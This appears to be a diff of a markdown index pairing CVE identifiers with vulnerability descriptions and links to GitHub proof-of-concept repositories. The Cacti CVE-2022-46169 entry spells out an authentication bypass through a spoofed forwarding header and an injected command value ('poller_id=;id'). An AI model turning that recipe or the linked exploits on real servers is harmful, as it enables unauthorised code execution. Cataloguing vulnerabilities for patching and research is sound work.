+- [sudoninja-noob/CVE-2022-45728](https://github.com/sudoninja-noob/CVE-2022-45728)
+
+### CVE-2022-45729 (2023-01-12)
+
+A cross-site scripting (XSS) vulnerability in Doctor Appointment Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Employee ID parameter.
+
+
+- [sudoninja-noob/CVE-2022-45729](https://github.com/sudoninja-noob/CVE-2022-45729)
+
+### CVE-2022-45770 (2023-01-26)
+
+Improper input validation in adgnetworkwfpdrv.sys in Adguard For Windows x86 through 7.11 allows local privilege escalation.
+
+
+- [Marsel-marsel/CVE-2022-45770](https://github.com/Marsel-marsel/CVE-2022-45770)
+
### CVE-2022-45771 (2022-12-05)
An issue in the /api/audits component of Pwndoc v0.5.3 allows attackers to escalate privileges and execute arbitrary code via uploading a crafted audit file.
- [p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE](https://github.com/p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE)
+- [yuriisanin/CVE-2022-45771](https://github.com/yuriisanin/CVE-2022-45771)
### CVE-2022-45808 (2023-01-24)
@@ -5303,6 +15288,15 @@
- [RandomRobbieBF/CVE-2022-45808](https://github.com/RandomRobbieBF/CVE-2022-45808)
+### CVE-2022-45934 (2022-11-27)
+
+An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets.
+
+
+- [Trinadh465/linux-4.19.72_CVE-2022-45934](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-45934)
+- [Trinadh465/linux-4.1.15_CVE-2022-45934](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-45934)
+- [Satheesh575555/linux-4.1.15_CVE-2022-45934](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-45934)
+
### CVE-2022-45988 (2023-03-03)
starsoftcomm CooCare 5.304 allows local attackers to escalate privileges and execute arbitrary commands via a crafted file upload.
@@ -5310,6 +15304,37 @@
- [happy0717/CVE-2022-45988](https://github.com/happy0717/CVE-2022-45988)
+### CVE-2022-46080 (2023-07-06)
+
+Nexxt Nebula 1200-AC 15.03.06.60 allows authentication bypass and command execution by using the HTTPD service to enable TELNET.
+
+
+- [yerodin/CVE-2022-46080](https://github.com/yerodin/CVE-2022-46080)
+
+### CVE-2022-46087 (2023-01-30)
+
+CloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notification received by the admin user.
+
+
+- [G37SYS73M/CVE-2022-46087](https://github.com/G37SYS73M/CVE-2022-46087)
+
+### CVE-2022-46104
+- [NurSec747/CVE-2022-46104---POC](https://github.com/NurSec747/CVE-2022-46104---POC)
+
+### CVE-2022-46164 (2022-12-05)
+
+NodeBB is an open source Node.js based forum software. Due to a plain object with a prototype being used in socket.io message handling a specially crafted payload can be used to impersonate other users and takeover accounts. This vulnerability has been patched in version 2.6.1. Users are advised to upgrade. Users unable to upgrade may cherry-pick commit `48d143921753914da45926cca6370a92ed0c46b8` into their codebase to patch the exploit.\n
+
+
+- [stephenbradshaw/CVE-2022-46164-poc](https://github.com/stephenbradshaw/CVE-2022-46164-poc)
+
+### CVE-2022-46166 (2022-12-09)
+
+Spring boot admins is an open source administrative user interface for management of spring boot applications. All users who run Spring Boot Admin Server, having enabled Notifiers (e.g. Teams-Notifier) and write access to environment variables via UI are affected. Users are advised to upgrade to the most recent releases of Spring Boot Admin 2.6.10 and 2.7.8 to resolve this issue. Users unable to upgrade may disable any notifier or disable write access (POST request) on `/env` actuator endpoint.\n\n
+
+
+- [DickDock/CVE-2022-46166](https://github.com/DickDock/CVE-2022-46166)
+
### CVE-2022-46169 (2022-12-05)
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks serval `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry. After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. By e.g. providing the `poller_id=;id` the `id` command is executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with an `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a productive instance because this action is added by some predefined templates like `Device - Uptime` or `Device - Polling Time`.\n\nThis command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_...` `$_SERVER` variables. If these should be kept for compatibility reasons it should at least be prevented to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch.
@@ -5318,8 +15343,28 @@
- [imjdl/CVE-2022-46169](https://github.com/imjdl/CVE-2022-46169)
- [0xf4n9x/CVE-2022-46169](https://github.com/0xf4n9x/CVE-2022-46169)
- [taythebot/CVE-2022-46169](https://github.com/taythebot/CVE-2022-46169)
+- [Inplex-sys/CVE-2022-46169](https://github.com/Inplex-sys/CVE-2022-46169)
+- [sAsPeCt488/CVE-2022-46169](https://github.com/sAsPeCt488/CVE-2022-46169)
+- [c3rrberu5/CVE-2022-46169](https://github.com/c3rrberu5/CVE-2022-46169)
+- [Habib0x0/CVE-2022-46169](https://github.com/Habib0x0/CVE-2022-46169)
+- [N1arut/CVE-2022-46169_POC](https://github.com/N1arut/CVE-2022-46169_POC)
+- [miko550/CVE-2022-46169](https://github.com/miko550/CVE-2022-46169)
+- [ariyaadinatha/cacti-cve-2022-46169-exploit](https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit)
+- [doosec101/CVE-2022-46169](https://github.com/doosec101/CVE-2022-46169)
+- [m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application](https://github.com/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application)
+- [devAL3X/CVE-2022-46169_poc](https://github.com/devAL3X/CVE-2022-46169_poc)
+- [JacobEbben/CVE-2022-46169_unauth_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46169_unauth_remote_code_execution)
+- [icebreack/CVE-2022-46169](https://github.com/icebreack/CVE-2022-46169)
+- [devilgothies/CVE-2022-46169](https://github.com/devilgothies/CVE-2022-46169)
+- [yassinebk/CVE-2022-46169](https://github.com/yassinebk/CVE-2022-46169)
- [ruycr4ft/CVE-2022-46169](https://github.com/ruycr4ft/CVE-2022-46169)
- [FredBrave/CVE-2022-46169-CACTI-1.2.22](https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22)
+- [sha-16/RCE-Cacti-1.2.22](https://github.com/sha-16/RCE-Cacti-1.2.22)
+- [Safarchand/CVE-2022-46169](https://github.com/Safarchand/CVE-2022-46169)
+- [MarkStrendin/CVE-2022-46169](https://github.com/MarkStrendin/CVE-2022-46169)
+- [BKreisel/CVE-2022-46169](https://github.com/BKreisel/CVE-2022-46169)
+- [Rickster5555/EH2-PoC](https://github.com/Rickster5555/EH2-PoC)
+- [antisecc/CVE-2022-46169](https://github.com/antisecc/CVE-2022-46169)
- [dawnl3ss/CVE-2022-46169](https://github.com/dawnl3ss/CVE-2022-46169)
- [a1665454764/CVE-2022-46169](https://github.com/a1665454764/CVE-2022-46169)
- [0xZon/CVE-2022-46169-Exploit](https://github.com/0xZon/CVE-2022-46169-Exploit)
@@ -5328,6 +15373,16 @@
- [mind2hex/CVE-2022-46169](https://github.com/mind2hex/CVE-2022-46169)
- [HPT-Intern-Task-Submission/CVE-2022-46169](https://github.com/HPT-Intern-Task-Submission/CVE-2022-46169)
+### CVE-2022-46175 (2022-12-24)
+
+JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including versions 1.0.1 and 2.2.1 does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. `JSON5.parse` should restrict parsing of `__proto__` keys when parsing JSON strings to objects. As a point of reference, the `JSON.parse` method included in JavaScript ignores `__proto__` keys. Simply changing `JSON5.parse` to `JSON.parse` in the examples above mitigates this vulnerability. This vulnerability is patched in json5 versions 1.0.2, 2.2.2, and later.
+
+
+- [giz-berlin/quasar-app-webpack-json5-vulnerability](https://github.com/giz-berlin/quasar-app-webpack-json5-vulnerability)
+
+### CVE-2022-46196
+- [dpgg101/CVE-2022-46196](https://github.com/dpgg101/CVE-2022-46196)
+
### CVE-2022-46381 (2022-12-13)
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
@@ -5343,6 +15398,14 @@
- [Pro-me3us/CVE_2022_46395_Gazelle](https://github.com/Pro-me3us/CVE_2022_46395_Gazelle)
- [Pro-me3us/CVE_2022_46395_Raven](https://github.com/Pro-me3us/CVE_2022_46395_Raven)
+### CVE-2022-46463 (2023-01-12)
+
+An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication. NOTE: the vendor's position is that this "is clearly described in the documentation as a feature."
+
+
+- [nu0l/CVE-2022-46463](https://github.com/nu0l/CVE-2022-46463)
+- [404tk/CVE-2022-46463](https://github.com/404tk/CVE-2022-46463)
+
### CVE-2022-46484 (2023-08-02)
Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys.
@@ -5357,6 +15420,34 @@
- [WodenSec/CVE-2022-46485](https://github.com/WodenSec/CVE-2022-46485)
+### CVE-2022-46505 (2023-01-18)
+
+An issue in MatrixSSL 4.5.1-open and earlier leads to failure to securely check the SessionID field, resulting in the misuse of an all-zero MasterSecret that can decrypt secret data.
+
+
+- [SmallTown123/details-for-CVE-2022-46505](https://github.com/SmallTown123/details-for-CVE-2022-46505)
+
+### CVE-2022-46604 (2023-02-02)
+
+An issue in Tecrail Responsive FileManager v9.9.5 and below allows attackers to bypass the file extension check mechanism and upload a crafted PHP file, leading to arbitrary code execution.
+
+
+- [galoget/ResponsiveFileManager-CVE-2022-46604](https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604)
+
+### CVE-2022-46622 (2023-01-12)
+
+A cross-site scripting (XSS) vulnerability in Judging Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter.
+
+
+- [sudoninja-noob/CVE-2022-46622](https://github.com/sudoninja-noob/CVE-2022-46622)
+
+### CVE-2022-46623 (2023-01-12)
+
+Judging Management System v1.0.0 was discovered to contain a SQL injection vulnerability via the username parameter.
+
+
+- [sudoninja-noob/CVE-2022-46623](https://github.com/sudoninja-noob/CVE-2022-46623)
+
### CVE-2022-46638
- [naonymous101/CVE-2022-46638](https://github.com/naonymous101/CVE-2022-46638)
@@ -5370,7 +15461,36 @@
- [straight-tamago/NoCameraSound](https://github.com/straight-tamago/NoCameraSound)
- [ginsudev/WDBFontOverwrite](https://github.com/ginsudev/WDBFontOverwrite)
- [mineek/FileManager](https://github.com/mineek/FileManager)
+- [straight-tamago/NoHomeBar](https://github.com/straight-tamago/NoHomeBar)
+- [straight-tamago/DockTransparent](https://github.com/straight-tamago/DockTransparent)
+- [straight-tamago/FileSwitcherX](https://github.com/straight-tamago/FileSwitcherX)
+- [BomberFish/Mandela-Legacy](https://github.com/BomberFish/Mandela-Legacy)
+- [BomberFish/JailedCement](https://github.com/BomberFish/JailedCement)
+- [BomberFish/Mandela-Classic](https://github.com/BomberFish/Mandela-Classic)
+- [enty8080/MacDirtyCow](https://github.com/enty8080/MacDirtyCow)
- [tdquang266/MDC](https://github.com/tdquang266/MDC)
+- [69camau/sw1tch](https://github.com/69camau/sw1tch)
+
+### CVE-2022-46718 (2023-06-23)
+
+A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, macOS Monterey 12.6.2. An app may be able to read sensitive location information
+
+
+- [biscuitehh/cve-2022-46718-leaky-location](https://github.com/biscuitehh/cve-2022-46718-leaky-location)
+
+### CVE-2022-46836 (2023-02-20)
+
+PHP code injection in watolib auth.php and hosttags.php in Tribe29's Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29 allows an attacker to inject and execute PHP code which will be executed upon request of the vulnerable component.
+
+
+- [JacobEbben/CVE-2022-46836_remote_code_execution](https://github.com/JacobEbben/CVE-2022-46836_remote_code_execution)
+
+### CVE-2022-47102 (2023-01-12)
+
+A cross-site scripting (XSS) vulnerability in Student Study Center Management System V 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.
+
+
+- [sudoninja-noob/CVE-2022-47102](https://github.com/sudoninja-noob/CVE-2022-47102)
### CVE-2022-47197 (2023-01-19)
@@ -5387,6 +15507,13 @@
- [Argonx21/CVE-2022-47373](https://github.com/Argonx21/CVE-2022-47373)
+### CVE-2022-47529 (2023-03-28)
+
+Insecure Win32 memory objects in Endpoint Windows Agents in RSA NetWitness Platform before 12.2 allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.
+
+
+- [hyp3rlinx/CVE-2022-47529](https://github.com/hyp3rlinx/CVE-2022-47529)
+
### CVE-2022-47615 (2023-01-24)
Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
@@ -5394,6 +15521,20 @@
- [RandomRobbieBF/CVE-2022-47615](https://github.com/RandomRobbieBF/CVE-2022-47615)
+### CVE-2022-47872 (2023-02-01)
+
+A Server-Side Request Forgery (SSRF) in maccms10 v2021.1000.2000 allows attackers to force the application to make arbitrary requests via a crafted payload injected into the Name parameter under the Interface address module.
+
+
+- [Cedric1314/CVE-2022-47872](https://github.com/Cedric1314/CVE-2022-47872)
+
+### CVE-2022-47909 (2023-02-20)
+
+Livestatus Query Language (LQL) injection in the AuthUser HTTP query header of Tribe29's Checkmk <= 2.1.0p11, Checkmk <= 2.0.0p28, and all versions of Checkmk 1.6.0 (EOL) allows an attacker to perform direct queries to the application's core from localhost.
+
+
+- [JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion](https://github.com/JacobEbben/CVE-2022-47909_unauth_arbitrary_file_deletion)
+
### CVE-2022-47952 (2023-01-01)
lxc-user-nic in lxc through 5.0.1 is installed setuid root, and may allow local users to infer whether any file exists, even within a protected directory tree, because "Failed to open" often indicates that a file does not exist, whereas "does not refer to a network namespace path" often indicates that a file exists. NOTE: this is different from CVE-2018-6556 because the CVE-2018-6556 fix design was based on the premise that "we will report back to the user that the open() failed but the user has no way of knowing why it failed"; however, in many realistic cases, there are no plausible reasons for failing except that the file does not exist.
@@ -5401,6 +15542,33 @@
- [MaherAzzouzi/CVE-2022-47952](https://github.com/MaherAzzouzi/CVE-2022-47952)
+### CVE-2022-47966 (2023-01-18)
+
+Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache Santuario xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. This affects Access Manager Plus before 4308, Active Directory 360 before 4310, ADAudit Plus before 7081, ADManager Plus before 7162, ADSelfService Plus before 6211, Analytics Plus before 5150, Application Control Plus before 10.1.2220.18, Asset Explorer before 6983, Browser Security Plus before 11.1.2238.6, Device Control Plus before 10.1.2220.18, Endpoint Central before 10.1.2228.11, Endpoint Central MSP before 10.1.2228.11, Endpoint DLP before 10.1.2137.6, Key Manager Plus before 6401, OS Deployer before 1.1.2243.1, PAM 360 before 5713, Password Manager Pro before 12124, Patch Manager Plus before 10.1.2220.18, Remote Access Plus before 10.1.2228.11, Remote Monitoring and Management (RMM) before 10.1.41. ServiceDesk Plus before 14004, ServiceDesk Plus MSP before 13001, SupportCenter Plus before 11026, and Vulnerability Manager Plus before 10.1.2220.18. Exploitation is only possible if SAML SSO has ever been configured for a product (for some products, exploitation requires that SAML SSO is currently active).
+
+
+- [horizon3ai/CVE-2022-47966](https://github.com/horizon3ai/CVE-2022-47966)
+- [shameem-testing/PoC-for-ME-SAML-Vulnerability](https://github.com/shameem-testing/PoC-for-ME-SAML-Vulnerability)
+- [Inplex-sys/CVE-2022-47966](https://github.com/Inplex-sys/CVE-2022-47966)
+- [ACE-Responder/CVE-2022-47966_checker](https://github.com/ACE-Responder/CVE-2022-47966_checker)
+- [vonahisec/CVE-2022-47966-Scan](https://github.com/vonahisec/CVE-2022-47966-Scan)
+
+### CVE-2022-47986 (2023-02-17)
+
+\nIBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.\n\n
+
+
+- [ohnonoyesyes/CVE-2022-47986](https://github.com/ohnonoyesyes/CVE-2022-47986)
+- [dhina016/CVE-2022-47986](https://github.com/dhina016/CVE-2022-47986)
+- [mauricelambert/CVE-2022-47986](https://github.com/mauricelambert/CVE-2022-47986)
+
+### CVE-2022-48150 (2023-04-21)
+
+Shopware v5.5.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the recovery/install/ URI.
+
+
+- [sahilop123/-CVE-2022-48150](https://github.com/sahilop123/-CVE-2022-48150)
+
### CVE-2022-48194 (2022-12-30)
TP-Link TL-WR902AC devices through V3 0.9.1 allow remote authenticated attackers to execute arbitrary code or cause a Denial of Service (DoS) by uploading a crafted firmware update because the signature check is inadequate.
@@ -5408,10 +15576,6796 @@
- [otsmr/internet-of-vulnerable-things](https://github.com/otsmr/internet-of-vulnerable-things)
+### CVE-2022-48197 (2023-01-02)
+
+Reflected cross-site scripting (XSS) exists in Sandbox examples in the YUI2 repository. The download distributions, TreeView component and the YUI Javascript library overall are not affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
+
+
+- [ryan412/CVE-2022-48197](https://github.com/ryan412/CVE-2022-48197)
+
+### CVE-2022-48311 (2023-02-06)
+
+**UNSUPPORTED WHEN ASSIGNED** Cross Site Scripting (XSS) in HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B allows authenticated attacker to inject their own script into the page via HTTP configuration page. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
+
+
+- [swzhouu/CVE-2022-48311](https://github.com/swzhouu/CVE-2022-48311)
+
+### CVE-2022-48474 (2023-09-12)
+
+Control de Ciber, in its 1.650 version, is affected by a Denial of Service condition through the version function. Sending a malicious request could cause the server to check if an unrecognized component is up to date, causing a memory failure error that shuts down the process.
+
+
+- [sapellaniz/CVE-2022-48474_CVE-2022-48475](https://github.com/sapellaniz/CVE-2022-48474_CVE-2022-48475)
+
## 2021
+### CVE-2021-0302 (2021-02-10)
+
+In PackageInstaller, there is a possible tapjacking attack due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10Android ID: A-155287782
+
+
+- [ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302](https://github.com/ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302)
+
+### CVE-2021-0306 (2021-01-11)
+
+In addAllPermissions of PermissionManagerService.java, there is a possible permissions bypass when upgrading major Android versions which allows an app to gain the android.permission.ACTIVITY_RECOGNITION permission without user confirmation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-154505240.
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317)
+
+### CVE-2021-0308 (2021-01-11)
+
+In ReadLogicalParts of basicmbr.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-158063095.
+
+
+- [Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308](https://github.com/Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308)
+
+### CVE-2021-0313 (2021-01-11)
+
+In isWordBreakAfter of LayoutUtils.cpp, there is a possible way to slow or crash a TextView due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.0, Android-8.1; Android ID: A-170968514.
+
+
+- [Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313](https://github.com/Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313)
+
+### CVE-2021-0314 (2021-02-10)
+
+In onCreate of UninstallerActivity, there is a possible way to uninstall an all without informed user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-171221302
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0314](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0314)
+
+### CVE-2021-0315 (2021-01-11)
+
+In onCreate of GrantCredentialsPermissionActivity.java, there is a possible way to convince the user to grant an app access to an account due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-169763814.
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0315](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0315)
+- [pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315](https://github.com/pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315)
+- [nanopathi/frameworks_base1_CVE-2021-0315](https://github.com/nanopathi/frameworks_base1_CVE-2021-0315)
+
+### CVE-2021-0316 (2021-01-11)
+
+In avrc_pars_vendor_cmd of avrc_pars_tg.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-168802990.
+
+
+- [Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316](https://github.com/Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316)
+
+### CVE-2021-0318 (2021-01-11)
+
+In appendEventsToCacheLocked of SensorEventConnection.cpp, there is a possible out of bounds write due to a use-after-free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-8.1, Android-10, Android-11; Android ID: A-168211968.
+
+
+- [nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318](https://github.com/nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318)
+
+### CVE-2021-0319 (2021-01-11)
+
+In checkCallerIsSystemOr of CompanionDeviceManagerService.java, there is a possible way to get a nearby Bluetooth device's MAC address without appropriate permissions due to a permissions bypass. This could lead to local escalation of privilege that grants access to nearby MAC addresses, with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-167244818.
+
+
+- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319)
+
+### CVE-2021-0325 (2021-02-10)
+
+In ih264d_parse_pslice of ih264d_parse_pslice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-174238784
+
+
+- [nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325](https://github.com/nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325)
+
+### CVE-2021-0326 (2021-02-10)
+
+In p2p_copy_client_info of p2p.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution if the target device is performing a Wi-Fi Direct search, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-172937525
+
+
+- [aemmitt-ns/skeleton](https://github.com/aemmitt-ns/skeleton)
+- [nanopathi/wpa_supplicant_8_CVE-2021-0326.](https://github.com/nanopathi/wpa_supplicant_8_CVE-2021-0326.)
+- [Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326](https://github.com/Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326)
+- [nanopathi/Packages_wpa_supplicant8_CVE-2021-0326](https://github.com/nanopathi/Packages_wpa_supplicant8_CVE-2021-0326)
+- [ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326](https://github.com/ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326)
+
+### CVE-2021-0327 (2021-02-10)
+
+In getContentProviderImpl of ActivityManagerService.java, there is a possible permission bypass due to non-restored binder identities. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-172935267
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0327](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0327)
+
+### CVE-2021-0328 (2021-02-10)
+
+In onBatchScanReports and deliverBatchScan of GattService.java, there is a possible way to retrieve Bluetooth scan results without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-172670415
+
+
+- [ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328](https://github.com/ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328)
+
+### CVE-2021-0329 (2021-02-10)
+
+In several native functions called by AdvertiseManager.java, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the Bluetooth server with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-171400004
+
+
+- [ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329](https://github.com/ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329)
+
+### CVE-2021-0330 (2021-02-10)
+
+In add_user_ce and remove_user_ce of storaged.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in storaged with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-170732441
+
+
+- [Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330](https://github.com/Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330)
+
+### CVE-2021-0331 (2021-02-10)
+
+In onCreate of NotificationAccessConfirmationActivity.java, there is a possible overlay attack due to an insecure default value. This could lead to local escalation of privilege and notification access with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-170731783
+
+
+- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331)
+
+### CVE-2021-0332 (2021-02-10)
+
+In bootFinished of SurfaceFlinger.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-169256435
+
+
+- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2021-0332](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2021-0332)
+
